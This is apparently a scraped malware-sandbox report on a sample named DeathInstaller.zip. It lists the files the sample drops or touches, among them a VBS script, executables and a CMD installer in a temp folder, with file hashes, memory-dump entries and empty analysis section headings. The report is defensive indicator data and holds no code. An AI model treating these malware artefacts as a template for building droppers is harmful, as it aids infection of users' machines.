C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
3KB

MD5
99a1b2e5ecfc94f13f55f8f3fa10d8a4

SHA1
f0e6d915f7df309be4b372328a53cf12bf44304a

SHA256
fa118f002401ffd17c03b82d5d9a95f8ecfe9b4ed88d0d8a6e1004a99c2fabc5

SHA512
3b6d54dca6a8ec37ff4ba2a60661a91367398c9b8ff0024a0eb14eeb3b1022b2a7f6c85353bba0867fa542177cde67edf52054a844f5703bad8143a46f821c26

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
0351b2277e636a87814ce5d9e01b5bd4

SHA1
be16038edcd9d0713cdbc7cf5e22d5c5e8b9c2c6

SHA256
948e1edd1ba640aee725cbdb38207bd8af0535b325d2b4b196ed05eb30af5ba9

SHA512
364d47b8b230c70a867c6975b5fc8e062c068fa3e910dd875f572426415d43cfdaba3fce0e3b9ff4a2f936c40519ded8581a4f4cc7ba1182062d48098702a34f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
11140e418345b3bf0d8239a7bfee92fe

SHA1
ec562fe8631e4d9f0b2cbfa91986dba62f7713e6

SHA256
ac5beb67454b92f2bb4e4ed49c5369dd26b7e88056511ab2535c0e556222f05f

SHA512
5169b9b01c225f7be3746f5e799e1fae8d9d05ee0bad32b8328f87279acaf55e24d30f8a82af130a8e608e7781c08570e8997dbbbefc71bcb8c2472dea71d7f8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
6692e4bc913fde6fcf52a877943361f9

SHA1
cebcfc9ae226c9f7c39b2e8c8120f7c01119d86c

SHA256
8a8b0c1bf88944fe8a80587390b2e85226676a46319639a3426662ce87cb9247

SHA512
294199b7c8dd4d51d8e5ca4fccc566c6c45f688e310a3c676f7ea948ce1d5543bc70b9d9902aef81348803497af043785cac5a61d4de94e24df9cf1e55474096

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
9a16eb5938d7c5c08a328fe2162038dc

SHA1
7bb80316d1432567b37ed8a5cbeb3a710f4ae24d

SHA256
7e9ebf2ddabbb4137b8855f6e7c8b2fff01f4cd0310e58d948af3ef1e12020a3

SHA512
e43a4926324aad939aae5725ea1d6d622800ca361cb1896585338acd21a10deb8a4b0d08256e4ebec11ca7ed978bf503963e69cbce7c7e5a7d505d644c4e9d38

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe582fd5.TMP

Filesize
1KB

MD5
42571c4e52bc67036149af289b437c40

SHA1
45ca8cf9100bcb8e75016d677283a857e1ab6fb4

SHA256
8b3509fe48589d52ac096e12a2b41c394f8cfe73dbfceaa867f7317274f375e6

SHA512
bf2e2233010d47f0c49d94ffe174e8b8812a228dc7bb135ab2901a2da418374918b171e06916aad09f6742c45ef7a47f1840863da9f434850b2eff08a37da11f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
9876576c7e827a5f17acfa3de680ad4d

SHA1
f7d7ec68350249b8eabb145dee64d9ed3b71cd7f

SHA256
1823463172c236a12fc7b11e34220fe535929e33c6393e867d86198de66ff968

SHA512
73e5156907770453ecab6ff9e3d7933e9156858217fc5cb57df252da9f70bb190909f8b382889ed82b41608a19dbc6af4091b9961945310e1847c938ac1ba5c5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
542e7c47629d1cc6b5018348f6c80454

SHA1
31f83cd6d64e326d690b20a72491f8b4ea3e5f55

SHA256
ccaaccd448b902915758f836e223377a1d8bda4689b8c6073041f613af75ebc2

SHA512
3d81ba3a1470b8cb3d394a19607c41fd8baa18727b60e5465c85f9d0f5b77366e7884f0946f7101d9d346e9582c6841d0cc552ef7532c082bc6876e6b9a9578d

Download Submit
C:\Users\Admin\AppData\Local\Temp\99E9.tmp\6.vbs

Filesize
65B

MD5
e3c9e67358dfd73fc9cb7c717850750e

SHA1
3ae9d21100a3b493b2c80d054b5f77ce9fc47b6d

SHA256
5c35949ac378e30dfaaa657ea604aaca3b6a0e48113725e7be2a7ec5f52c28db

SHA512
08c9a458c8b26737695d27ffc8f4d4d3ab26e9cb6fe66e62667f2795132c1dd214583e95c507b5e08a6f825156f632fd75c8cea8fe6a199e50a4b0f4606cb469

Download Submit
C:\Users\Admin\AppData\Local\Temp\99E9.tmp\66.exe

Filesize
20KB

MD5
06c23607c9981d94284ba00a4f513a7e

SHA1
65c1af5796250e079756d3b81f91b905a91fcaf4

SHA256
bae999e3131bf7bf9680760830cb0d462133f57ba6f8595bdd313c005934f87b

SHA512
74ffaab3fd126eed3594d2fbd35b82c90f092a7446ee67b9e0f8cc3af5de96846daef598deba5a45012f2b1ba5cd3bc6a4a9bd0d557062f55257ec994950a00c

Download Submit
C:\Users\Admin\AppData\Local\Temp\99E9.tmp\DeathInstaller.cmd

Filesize
4KB

MD5
f62a19e44fccb256e3b7dca67fec6237

SHA1
77ae4e6760c4b465e9b80f207318d08591cac13a

SHA256
433a2b16126bbcb92ba07e12c5c07e1ebb4fb56c84a0b28d550bf49c7ed82b92

SHA512
68d06e2d32da003aa1658f4254c2ae29a573eed7b240323d0f22eba0a4ed728cdbae358e405bca19a4001bace653518448f5bcf448a121c523c4a3b2ba46fc59

Download Submit
C:\Users\Admin\AppData\Local\Temp\99E9.tmp\die.bmp

Filesize
2.6MB

MD5
f8ad78efab2a29dbed7bc585b042adc0

SHA1
f7aadd31456da06eb86915b207aaa2dc12f58af3

SHA256
7c35142ad07231cae2e14e5e151a48d5824ef8415af0d84b76c33fb8ac1f6754

SHA512
ea549137ef866c9c5e110cb07d169cc5d11a2e50558907d55475e99b66c61eb4f660e546dd759ba71bc885c9fc1e5beab8d8338d7d4e3db707ec5988cddfb9d2

Download Submit
C:\Users\Admin\AppData\Local\Temp\99E9.tmp\mover.exe

Filesize
548KB

MD5
c1978e4080d1ec7e2edf49d6c9710045

SHA1
b6a87a32d80f6edf889e99fb47518e69435321ed

SHA256
c9e2a7905501745c304ffc5a70b290db40088d9dc10c47a98a953267468284a8

SHA512
2de11fdf749dc7f4073062cdd4881cf51b78e56cb27351f463a45c934388da2cda24bf6b71670b432c9fc039e24de9edd0e2d5382b67b2681e097636ba17626e

Download Submit
C:\Users\Admin\Downloads\DeathInstaller.zip

Filesize
5.0MB

MD5
0d77c116f8bf43dc9d5eafe2f755f9ec

SHA1
72e873e06ece37b23d04f77c4317f978a391bc89

SHA256
2f8d95f63f3e53e15f6badc567b13bbb664c135bf749c56cece346b66e254e52

SHA512
c3866edea2149c7d4d120515833d2d2549aa7fa317d42791e68e177042d9802399d6869d2794522695b5c6d11813dc7783555d22de45dd91bab0ab65dfe55996

Download Submit
memory/592-365-0x0000000000400000-0x000000000079B000-memory.dmp

Filesize
3.6MB

Download
memory/592-394-0x0000000000400000-0x000000000079B000-memory.dmp

Filesize
3.6MB

Download
memory/4036-362-0x0000000140000000-0x0000000140126000-memory.dmp

Filesize
1.1MB

Download
memory/4036-401-0x0000000140000000-0x0000000140126000-memory.dmp

Filesize
1.1MB

Download
memory/4036-400-0x0000000140000000-0x0000000140126000-memory.dmp

Filesize
1.1MB

Download
memory/4036-421-0x0000000140000000-0x0000000140126000-memory.dmp

Filesize
1.1MB

Download

Resubmissions

Analysis

Sharing

Errors

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads